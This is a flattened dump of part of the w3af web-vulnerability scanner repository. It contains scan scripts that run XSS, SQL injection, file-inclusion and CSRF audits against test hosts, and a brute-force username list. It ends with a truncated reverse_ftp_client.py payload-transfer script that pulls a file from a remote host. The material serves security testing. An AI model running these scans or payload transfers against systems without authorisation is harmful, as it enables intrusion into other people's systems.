https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/doc/sphinx/gui/images/target-conf.png -------------------------------------------------------------------------------- /doc/sphinx/gui/images/tools.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/doc/sphinx/gui/images/tools.png -------------------------------------------------------------------------------- /doc/sphinx/gui/images/using-profiles.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/doc/sphinx/gui/images/using-profiles.png -------------------------------------------------------------------------------- /doc/sphinx/gui/images/wizard.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/doc/sphinx/gui/images/wizard.png -------------------------------------------------------------------------------- /doc/sphinx/images/github-logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/doc/sphinx/images/github-logo.png -------------------------------------------------------------------------------- /doc/sphinx/images/irc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/doc/sphinx/images/irc.png -------------------------------------------------------------------------------- /doc/sphinx/images/mailing_list.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/doc/sphinx/images/mailing_list.png -------------------------------------------------------------------------------- /doc/sphinx/images/profile-error.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/doc/sphinx/images/profile-error.png -------------------------------------------------------------------------------- /doc/sphinx/images/twitter-logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/doc/sphinx/images/twitter-logo.png -------------------------------------------------------------------------------- /doc/sphinx/images/w3af-logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/doc/sphinx/images/w3af-logo.png -------------------------------------------------------------------------------- /extras/docker/docker-build-local.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This scripts builds Docker image from actual source code, so you can access it 4 | # as andresriancho/w3af:source 5 | # Use it if for any reasons you want to run w3af inside Docker 6 | 7 | cp Dockerfile ../../ 8 | cp .dockerignore ../../ 9 | 10 | cd ../../ 11 | 12 | docker build -t andresriancho/w3af:source . 13 | 14 | rm -rf Dockerfile 15 | rm -rf .dockerignore 16 | 17 | cd extras/docker/ 18 | -------------------------------------------------------------------------------- /extras/docker/dockercfg.template: -------------------------------------------------------------------------------- 1 | {"https://index.docker.io/v1/":{"auth":"","email":""}} 2 | -------------------------------------------------------------------------------- /extras/docker/scripts/common/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /extras/docker/scripts/common/w3af-docker.pub: -------------------------------------------------------------------------------- 1 | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDjXxcHjyVkwHT+dSYwS3vxhQxZAit6uZAFhuzA/dQ2vFu6jmPk1ewMGIYVO5D7xV3fo7/RXeCARzqHl6drw18gaxDoBG3ERI6LxVspIQYjDt5Vsqd1Lv++Jzyp/wkXDdAdioLTJyOerw7SOmznxqDj1QMPCQni4yhrE+pYH4XKxNx5SwxZTPgQWnQS7dasY23bv55OPgztI6KJzZidMEzzJVKBXHy1Ru/jjhmWBghiXYU5RBDLDYyT8gAoWedYgzVDmMZelLR6Y6ggNLOtMGiGYfPWDUz9Z6iDAUsOQBtCJy8Sj8RwSQNpmOgSzBanqnhed14hLwdYhnKWcPNMry71 w3af@w3af-docker.org 2 | -------------------------------------------------------------------------------- /result: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/result -------------------------------------------------------------------------------- /scripts/allowed_methods.w3af: -------------------------------------------------------------------------------- 1 | # check allowed_methods 2 | 3 | plugins 4 | output console,text_file 5 | output config text_file 6 | set output_file output-w3af.txt 7 | set verbose True 8 | back 9 | output config console 10 | set verbose False 11 | back 12 | infrastructure allowed_methods 13 | back 14 | 15 | target 16 | set target http://moth/w3af/ 17 | back 18 | 19 | start 20 | 21 | 22 | 23 | 24 | exit 25 | -------------------------------------------------------------------------------- /scripts/bing_spider.w3af: -------------------------------------------------------------------------------- 1 | # This scripts tests the Bing Spider plugin 2 | 3 | plugins 4 | output console,text_file 5 | output config text_file 6 | set output_file output-w3af.txt 7 | set verbose True 8 | back 9 | output config console 10 | set verbose True 11 | back 12 | 13 | crawl bing_spider 14 | crawl config bing_spider 15 | set resultLimit 10 16 | back 17 | back 18 | 19 | target 20 | set target http://www.bonsai-sec.com/ 21 | back 22 | 23 | start 24 | 25 | 26 | 27 | exit 28 | -------------------------------------------------------------------------------- /scripts/cross_domain.w3af: -------------------------------------------------------------------------------- 1 | # This script shows how w3af reads a crossdomain.xml file 2 | 3 | plugins 4 | crawl ria_enumerator 5 | back 6 | target 7 | set target http://moth 8 | back 9 | start 10 | 11 | 12 | 13 | 14 | exit 15 | -------------------------------------------------------------------------------- /scripts/csrf.w3af: -------------------------------------------------------------------------------- 1 | # This is the XSRF demo: 2 | 3 | plugins 4 | audit csrf 5 | output console,text_file 6 | output 7 | output config text_file 8 | set output_file output-w3af.txt 9 | set verbose True 10 | back 11 | back 12 | target 13 | set target http://moth/w3af/audit/csrf/csrf.php?abc=2 14 | back 15 | start 16 | 17 | 18 | 19 | exit 20 | -------------------------------------------------------------------------------- /scripts/digit_sum.w3af: -------------------------------------------------------------------------------- 1 | # digit_sum demo 2 | 3 | plugins 4 | output console,text_file 5 | output config text_file 6 | set output_file output-w3af.txt 7 | set verbose True 8 | back 9 | output config console 10 | set verbose False 11 | back 12 | discovery digit_sum 13 | back 14 | 15 | target 16 | set target http://moth/w3af/discovery/digit_sum/index1.php?id=22, http://moth/w3af/discovery/digit_sum/index-3-1.html 17 | back 18 | 19 | start 20 | 21 | 22 | 23 | exit 24 | -------------------------------------------------------------------------------- /scripts/eval.w3af: -------------------------------------------------------------------------------- 1 | # This is the eval() detection demo 2 | 3 | plugins 4 | output console,text_file 5 | output config text_file 6 | set output_file output-w3af.txt 7 | set verbose True 8 | back 9 | output config console 10 | set verbose False 11 | back 12 | back 13 | 14 | plugins 15 | audit eval 16 | back 17 | 18 | target 19 | set target http://moth/w3af/audit/eval/eval.php?c= 20 | back 21 | 22 | start 23 | 24 | 25 | 26 | exit 27 | -------------------------------------------------------------------------------- /scripts/exploit_fast.w3af: -------------------------------------------------------------------------------- 1 | # This is a fastexploit demo 2 | 3 | plugins 4 | audit xss 5 | infrastructure server_header,hmap 6 | infrastructure config hmap 7 | set gen_fingerprint True 8 | back 9 | output console 10 | output config console 11 | set verbose False 12 | back 13 | back 14 | 15 | http-settings 16 | set user_agent pepe 17 | back 18 | 19 | target 20 | set target http://moth/ 21 | back 22 | 23 | start 24 | 25 | exit 26 | 27 | -------------------------------------------------------------------------------- /scripts/filename_xss.w3af: -------------------------------------------------------------------------------- 1 | # This is a fuzz file name demo: 2 | 3 | misc-settings 4 | set fuzzFileName true 5 | back 6 | 7 | plugins 8 | output console,text_file 9 | output config text_file 10 | set output_file output-w3af.txt 11 | set verbose True 12 | back 13 | output config console 14 | set verbose False 15 | back 16 | 17 | audit xss 18 | back 19 | 20 | target 21 | set target http://moth/w3af/core/fuzzFileName/f00.php?var=1 22 | back 23 | 24 | start 25 | 26 | 27 | 28 | exit 29 | -------------------------------------------------------------------------------- /scripts/frontpage_version.w3af: -------------------------------------------------------------------------------- 1 | plugins 2 | output console,text_file 3 | output config text_file 4 | set output_file output-w3af.txt 5 | set verbose True 6 | back 7 | output config console 8 | set verbose False 9 | back 10 | 11 | infrastructure frontpage_version 12 | 13 | back 14 | 15 | target 16 | set target http://moth/w3af/ 17 | back 18 | 19 | start 20 | 21 | 22 | 23 | exit 24 | -------------------------------------------------------------------------------- /scripts/header_fuzzing.w3af: -------------------------------------------------------------------------------- 1 | # Header fuzzing ! 2 | 3 | misc-settings 4 | set fuzzCookie False 5 | set fuzzable_headers user-agent 6 | back 7 | 8 | plugins 9 | output console,text_file 10 | output config text_file 11 | set output_file output-w3af.txt 12 | set verbose True 13 | back 14 | output config console 15 | set verbose False 16 | back 17 | 18 | audit xss 19 | back 20 | 21 | target 22 | set target http://moth/w3af/core/header_fuzzing/index.php 23 | back 24 | 25 | start 26 | 27 | exit 28 | 29 | -------------------------------------------------------------------------------- /scripts/html_output.w3af: -------------------------------------------------------------------------------- 1 | # This script is a test for the html_file output plugin 2 | 3 | plugins 4 | output console, html_file 5 | output config html_file 6 | set output_file output-w3af.html 7 | set verbose True 8 | back 9 | output config console 10 | back 11 | 12 | crawl web_spider 13 | crawl config web_spider 14 | set only_forward True 15 | back 16 | audit xss 17 | back 18 | 19 | target 20 | set target http://moth/w3af/audit/xss/ 21 | back 22 | 23 | start 24 | 25 | 26 | 27 | exit 28 | -------------------------------------------------------------------------------- /scripts/list_all_plugins.w3af: -------------------------------------------------------------------------------- 1 | plugins 2 | list crawl 3 | list bruteforce 4 | list audit 5 | list evasion 6 | list output 7 | list grep 8 | back 9 | 10 | exploit 11 | list 12 | 13 | back 14 | 15 | 16 | exit 17 | -------------------------------------------------------------------------------- /scripts/local_file_include.w3af: -------------------------------------------------------------------------------- 1 | # This is the local file inclusion demo: 2 | 3 | plugins 4 | audit lfi 5 | output console,text_file 6 | output config text_file 7 | set output_file output-w3af.txt 8 | set verbose True 9 | back 10 | 11 | crawl web_spider 12 | crawl config web_spider 13 | set only_forward True 14 | back 15 | 16 | back 17 | 18 | target 19 | set target http://moth/w3af/audit/local_file_inclusion/index.html 20 | back 21 | 22 | start 23 | 24 | 25 | 26 | exit 27 | -------------------------------------------------------------------------------- /scripts/mangle_request.w3af: -------------------------------------------------------------------------------- 1 | # Mangle plugin testing! 2 | 3 | plugins 4 | output console,text_file 5 | output config text_file 6 | set output_file output-w3af.txt 7 | set verbose True 8 | back 9 | output config console 10 | set verbose False 11 | back 12 | 13 | mangle sed 14 | mangle config sed 15 | set expressions qh/User-agent/luser-agent/ 16 | back 17 | 18 | audit sqli 19 | back 20 | 21 | target 22 | set target http://moth/w3af/ 23 | back 24 | 25 | start 26 | 27 | 28 | 29 | exit -------------------------------------------------------------------------------- /scripts/mangle_response.w3af: -------------------------------------------------------------------------------- 1 | # Mangle plugin testing! 2 | 3 | plugins 4 | output console,text_file 5 | output config text_file 6 | set output_file output-w3af.txt 7 | set verbose True 8 | back 9 | output config console 10 | set verbose False 11 | back 12 | 13 | mangle sed 14 | mangle config sed 15 | set expressions sb/home/f00/ 16 | back 17 | 18 | audit sqli 19 | back 20 | 21 | target 22 | set target http://moth/w3af/mangle/sed/ 23 | back 24 | 25 | start 26 | 27 | 28 | 29 | exit -------------------------------------------------------------------------------- /scripts/profile-fast_scan.w3af: -------------------------------------------------------------------------------- 1 | # Simple fast_scan usage 2 | 3 | profiles 4 | list 5 | 6 | use fast_scan 7 | 8 | back 9 | 10 | plugins 11 | audit 12 | crawl 13 | output 14 | back 15 | 16 | target 17 | set target http://moth/w3af/ 18 | back 19 | 20 | start 21 | exit 22 | -------------------------------------------------------------------------------- /scripts/remote_file_include_local_ws.w3af: -------------------------------------------------------------------------------- 1 | # This is the rfi demo: 2 | 3 | plugins 4 | audit rfi 5 | audit config rfi 6 | set listenAddress 127.0.0.1 7 | set usew3afSite False 8 | back 9 | output console,text_file 10 | output config text_file 11 | set output_file output-w3af.txt 12 | set verbose True 13 | back 14 | back 15 | 16 | target 17 | set target http://moth/w3af/audit/remoteFileInclusion/vulnerable.php?file=f0as9 18 | back 19 | 20 | start 21 | 22 | 23 | 24 | exit 25 | -------------------------------------------------------------------------------- /scripts/remote_file_include_w3af_site.w3af: -------------------------------------------------------------------------------- 1 | # This is the rfi demo: 2 | 3 | plugins 4 | audit rfi 5 | audit config rfi 6 | set listenAddress 127.0.0.1 7 | set usew3afSite True 8 | back 9 | output console,text_file 10 | output config text_file 11 | set output_file output-w3af.txt 12 | set verbose True 13 | back 14 | back 15 | 16 | target 17 | set target http://moth/w3af/audit/remoteFileInclusion/vulnerable.php?file=f0as9 18 | back 19 | 20 | start 21 | 22 | 23 | 24 | exit 25 | -------------------------------------------------------------------------------- /scripts/spider_man.w3af: -------------------------------------------------------------------------------- 1 | # This is a test for the human spider 2 | 3 | plugins 4 | output console,text_file 5 | output 6 | output config text_file 7 | set output_file output-w3af.txt 8 | set verbose True 9 | back 10 | output config console 11 | set verbose True 12 | back 13 | crawl spider_man 14 | audit sqli 15 | audit 16 | back 17 | target 18 | set target http://127.0.0.1:8000/w3af/file_upload/ 19 | back 20 | start 21 | 22 | 23 | -------------------------------------------------------------------------------- /scripts/targets_from_file.w3af: -------------------------------------------------------------------------------- 1 | # Targets can be specified in a file like this: 2 | 3 | plugins 4 | infrastructure allowed_methods,web_spider 5 | 6 | output console,text_file 7 | output 8 | output config text_file 9 | set output_file output-agfnet.txt 10 | set verbosity 10 11 | back 12 | output config console 13 | set verbosity 0 14 | back 15 | audit all 16 | audit 17 | back 18 | target 19 | set target file:///tmp/targets.txt 20 | back 21 | start 22 | 23 | 24 | -------------------------------------------------------------------------------- /scripts/web_spider.w3af: -------------------------------------------------------------------------------- 1 | # webspider 2 | 3 | plugins 4 | output console,text_file 5 | output config text_file 6 | set output_file output-w3af.txt 7 | set verbose True 8 | back 9 | output config console 10 | set verbose False 11 | back 12 | 13 | crawl web_spider 14 | crawl config web_spider 15 | set only_forward True 16 | back 17 | back 18 | 19 | target 20 | set target http://127.0.0.1:8000/crawl/web_spider/test_case_01/ 21 | back 22 | 23 | start 24 | 25 | 26 | 27 | exit 28 | -------------------------------------------------------------------------------- /scripts/xss_stored.w3af: -------------------------------------------------------------------------------- 1 | # permanent xss detection 2 | 3 | plugins 4 | output console,text_file 5 | output config text_file 6 | set output_file output-w3af.txt 7 | set verbose True 8 | back 9 | output config console 10 | set verbose False 11 | back 12 | 13 | audit xss 14 | back 15 | 16 | target 17 | set target http://moth/w3af/audit/xss/stored/reader.php?a=f00, http://moth/w3af/audit/xss/stored/writer.php?a=g99&b=00 18 | back 19 | 20 | start 21 | 22 | 23 | 24 | exit 25 | 26 | -------------------------------------------------------------------------------- /w3af/core/controllers/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/auto_update/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /w3af/core/controllers/auto_update/tests/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/auto_update/tests/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/bruteforce/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/bruteforce/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/bruteforce/combo.txt: -------------------------------------------------------------------------------- 1 | andres:w3af 2 | -------------------------------------------------------------------------------- /w3af/core/controllers/bruteforce/users.txt: -------------------------------------------------------------------------------- 1 | admin 2 | admin0 3 | admin1 4 | admin2 5 | administrador 6 | Administrador 7 | administrator 8 | Administrator 9 | prueba 10 | prueba1 11 | prueba2 12 | test 13 | test1 14 | test2 15 | testuser 16 | user 17 | user1 18 | 19 | -------------------------------------------------------------------------------- /w3af/core/controllers/ci/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/ci/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/ci/circleci/__init__.py: -------------------------------------------------------------------------------- 1 | __author__ = 'pedro' 2 | -------------------------------------------------------------------------------- /w3af/core/controllers/ci/helpers/__init__.py: -------------------------------------------------------------------------------- 1 | __author__ = 'pablo' 2 | -------------------------------------------------------------------------------- /w3af/core/controllers/ci/helpers/router.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /w3af/core/controllers/ci/helpers/set_root_password.sql: -------------------------------------------------------------------------------- 1 | USE mysql; 2 | 3 | UPDATE user set password=PASSWORD("testpass") where User='root'; 4 | FLUSH privileges; 5 | -------------------------------------------------------------------------------- /w3af/core/controllers/ci/install_scripts/install_core_dependencies.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash -x 2 | 3 | # We now install the core dependencies for the w3af project. 4 | python -c 'from w3af.core.controllers.dependency_check.dependency_check import dependency_check;dependency_check()' 5 | 6 | if [ -f requirements.txt ]; then 7 | pip install -r requirements.txt; 8 | fi 9 | 10 | -------------------------------------------------------------------------------- /w3af/core/controllers/ci/install_scripts/install_wavsep.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash -x 2 | 3 | if [ ! -d "pico-wavsep" ]; then 4 | git clone https://github.com/andresriancho/pico-wavsep.git 5 | fi 6 | 7 | # Update to the latest revision 8 | cd pico-wavsep/ 9 | git pull 10 | git checkout master 11 | #git log -n 1 12 | 13 | # Let the rest of the world know where we'll listen 14 | echo 'localhost:8098' > /tmp/wavsep.txt 15 | 16 | # The service itself is started in circle.yml 17 | -------------------------------------------------------------------------------- /w3af/core/controllers/ci/nosetests_wrapper/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/ci/nosetests_wrapper/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/ci/nosetests_wrapper/utils/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/ci/nosetests_wrapper/utils/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/core_helpers/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/core_helpers/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/core_helpers/consumers/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/core_helpers/consumers/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/core_helpers/not_found/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/core_helpers/not_found/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/core_helpers/not_found/tests/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/core_helpers/not_found/tests/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/core_helpers/strategy_observers/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /w3af/core/controllers/core_helpers/strategy_observers/tests/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /w3af/core/controllers/core_helpers/tests/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/core_helpers/tests/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/cors/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/cors/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/csp/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/csp/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/csp/tests/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/csp/tests/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/daemons/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/daemons/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/daemons/proxy/__init__.py: -------------------------------------------------------------------------------- 1 | from .handler import ProxyHandler 2 | from .proxy import Proxy 3 | from .intercept_handler import InterceptProxyHandler 4 | from .intercept_proxy import InterceptProxy 5 | 6 | -------------------------------------------------------------------------------- /w3af/core/controllers/daemons/proxy/ca/README.md: -------------------------------------------------------------------------------- 1 | # Generate new CA 2 | 3 | ```python 4 | from netlib import http_auth, certutils 5 | 6 | ca_dir = '/home/pablo/pch/w3af/w3af/core/controllers/daemons/proxy/ca/' 7 | certutils.CertStore.create_store(ca_dir, 'mitmproxy', o='w3af MITM CA', cn='w3af MITM CA') 8 | ``` 9 | -------------------------------------------------------------------------------- /w3af/core/controllers/daemons/proxy/ca/mitmproxy-ca-cert.p12: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/daemons/proxy/ca/mitmproxy-ca-cert.p12 -------------------------------------------------------------------------------- /w3af/core/controllers/daemons/proxy/templates/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /w3af/core/controllers/daemons/proxy/templates/base.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | {% block head %} 5 | 6 | {% block title %}w3af{% endblock %} 7 | {% endblock %} 8 | 9 | 10 | {% block content %} 11 | 12 | {% endblock %} 13 | 14 | 15 | -------------------------------------------------------------------------------- /w3af/core/controllers/daemons/proxy/templates/drop.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | 3 | {% block title %}Intercept Proxy{% endblock %} 4 | 5 | {% block content %} 6 |

HTTP request drop by user

7 | {% endblock %} 8 | -------------------------------------------------------------------------------- /w3af/core/controllers/daemons/proxy/templates/spiderman_end.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | 3 | {% block title %}Spider-man Proxy{% endblock %} 4 | 5 | {% block content %} 6 |

spider_man plugin finished its execution.

7 | {% endblock %} 8 | -------------------------------------------------------------------------------- /w3af/core/controllers/daemons/proxy/tests/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /w3af/core/controllers/daemons/tests/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/daemons/tests/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/delay_detection/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/delay_detection/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/delay_detection/tests/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/delay_detection/tests/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/dependency_check/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/dependency_check/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/dependency_check/external/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/dependency_check/external/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/dependency_check/platforms/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/dependency_check/platforms/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/dependency_check/platforms/tests/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/dependency_check/platforms/tests/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/dependency_check/tests/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/dependency_check/tests/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/easy_contribution/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/easy_contribution/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/easy_contribution/tests/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/easy_contribution/tests/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/exception_handling/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/exception_handling/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/exception_handling/tests/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/exception_handling/tests/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/extrusion_scanning/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/extrusion_scanning/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/extrusion_scanning/client/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/extrusion_scanning/client/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/extrusion_scanning/server/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/extrusion_scanning/server/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/extrusion_scanning/tests/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/extrusion_scanning/tests/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/intrusion_tools/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/intrusion_tools/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/javascript/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/javascript/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/misc/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/misc/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/misc/get_unused_port.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | 4 | def get_unused_port(): 5 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 6 | s.bind(('127.0.0.1', 0)) 7 | _, port = s.getsockname() 8 | s.close() 9 | return port -------------------------------------------------------------------------------- /w3af/core/controllers/misc/tests/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/misc/tests/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/misc/tests/data/code-detect-false-positive.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/misc/tests/data/code-detect-false-positive.jpg -------------------------------------------------------------------------------- /w3af/core/controllers/output_manager/tests/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /w3af/core/controllers/payload_transfer/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/controllers/payload_transfer/__init__.py -------------------------------------------------------------------------------- /w3af/core/controllers/payload_transfer/reverse_ftp_client.py: -------------------------------------------------------------------------------- 1 | if __name__ == '__main__': 2 | import socket 3 | import sys 4 | 5 | ip = sys.argv[1] 6 | port = sys.argv[2] 7 | f = file(sys.argv[3], 'w') 8 | 9 | cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 10 | cs.connect((ip, port)) 11 | 12 | while 1: 13 